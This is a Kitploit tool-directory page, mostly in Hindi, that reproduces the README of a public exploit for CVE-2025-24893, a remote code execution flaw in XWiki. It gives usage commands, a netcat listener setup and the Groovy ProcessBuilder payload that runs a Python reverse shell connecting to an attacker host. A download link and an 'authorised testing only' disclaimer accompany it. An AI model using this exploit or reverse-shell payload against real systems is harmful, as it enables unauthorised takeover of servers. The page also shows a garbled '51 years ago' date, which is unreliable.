Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2025-24893 — Modified exploit for CVE-2025-24893 | Kitploit
उपकरण/GitHubGitHub/hackersonsteroids/cve-2025-24893
ExploitationWeb Application ExploitationPenetration TestingLearning & EducationRemote Access ToolPayload Development
GitHubhackersonsteroids/cve-2025-24893

cve-2025-24893

Modified exploit for CVE-2025-24893

रिपॉजिटरी देखें
51 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24893 XWiki RCE शोषण

Exploit Banner

XWiki प्लेटफ़ॉर्म में CVE-2025-24893, एक दूरस्थ कोड निष्पादन (RCE) भेद्यता का शोषण करने के लिए एक सरल Python3 स्क्रिप्ट, जो Groovy-आधारित async मैक्रो और एक कॉन्फ़िगरेबल रिवर्स शेल पेलोड का उपयोग करती है।

⚠️ चेतावनी: यह उपकरण केवल शैक्षिक और अधिकृत परीक्षण उद्देश्यों के लिए प्रदान किया गया है। उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है, अवैध और अनैतिक है।


विषय सूची

  • विशेषताएँ
  • आवश्यकताएँ
  • स्थापना
  • उपयोग
  • पता लगाना और प्रोटोकॉल फ़ॉलबैक
  • रिवर्स शेल पेलोड
  • लाइसेंस
  • अस्वीकरण

विशेषताएँ

  • ✅ स्वचालित रूप से पता लगाता है कि लक्ष्य HTTPS या HTTP का समर्थन करता है या नहीं
  • ✅ Runtime.exec की विचित्रताओं से बचने के लिए एक Groovy ProcessBuilder स्निपेट तैयार करता है
  • ✅ XWiki async+groovy मैक्रो पेलोड को URL-एनकोड करता है
  • ✅ कॉन्फ़िगरेबल रिवर्स शेल (होस्ट + पोर्ट)
  • ✅ डिलीवरी की पुष्टि में मदद के लिए HTTP प्रतिक्रिया कोड प्रिंट करता है

आवश्यकताएँ

  • Python 3.6 या उच्चतर
  • requests लाइब्रेरी
root@kitploit:~
pip install requests

स्थापना

इस रिपॉजिटरी को क्लोन करें:

root@kitploit:~
git clone https://github.com/hackersonsteroids/cve-2025-24893.git
cd cve-2025-24893

उपयोग

root@kitploit:~
./exploit.py <TARGET_DOMAIN> <LHOST> <LPORT>
  • <TARGET_DOMAIN> XWiki होस्ट (जैसे wiki.example.local)।

  • <LHOST> आपकी आक्रमणकारी मशीन का IP (जहाँ आपका लिसनर चल रहा है)।

  • <LPORT> आपका लिसनर पोर्ट (पूर्णांक)।


उदाहरण

  1. अपनी मशीन पर एक लिसनर शुरू करें:
root@kitploit:~
nc -lvnp 4444
  1. शोषण चलाएँ:
root@kitploit:~
./exploit.py wiki.vulnerable.local 10.0.0.5 4444
  1. सफल होने पर, शेल के लिए अपने netcat लिसनर की जाँच करें।

पता लगाना और प्रोटोकॉल फ़ॉलबैक

पेलोड भेजने से पहले, स्क्रिप्ट:

  1. https://<TARGET_DOMAIN> को आज़माती है
  2. HTTPS विफल होने पर http://<TARGET_DOMAIN> पर फ़ॉलबैक करती है
  3. यदि दोनों में से कोई भी पहुँच योग्य नहीं है तो बाहर निकल जाती है

यह मिश्रित-प्रोटोकॉल परिनियोजन के साथ संगतता सुनिश्चित करने में मदद करता है।


रिवर्स शेल पेलोड

डिफ़ॉल्ट रूप से, स्क्रिप्ट एक Python3 वन-लाइनर का उपयोग करती है:

root@kitploit:~
new ProcessBuilder(
  ['/bin/bash','-c',
   'python3 -c \'import socket,subprocess,os;'
   's=socket.socket();s.connect(("LHOST",LPORT));'
   'os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);'
   'os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])\'']
).redirectErrorStream(true).start()
  • यदि आपको किसी भिन्न शेल (जैसे Bash, Perl, PHP, आदि) की आवश्यकता है तो आप build_payload() फ़ंक्शन को संशोधित कर सकते हैं।

लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है। विवरण के लिए LICENSE फ़ाइल देखें।


अस्वीकरण

यह उपकरण अधिकृत सुरक्षा मूल्यांकन और शैक्षिक उद्देश्यों के लिए डिज़ाइन किया गया है। लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेते हैं। किसी भी लक्ष्य प्रणाली का परीक्षण करने से पहले हमेशा स्पष्ट अनुमति प्राप्त करें।

टूल डाउनलोड करें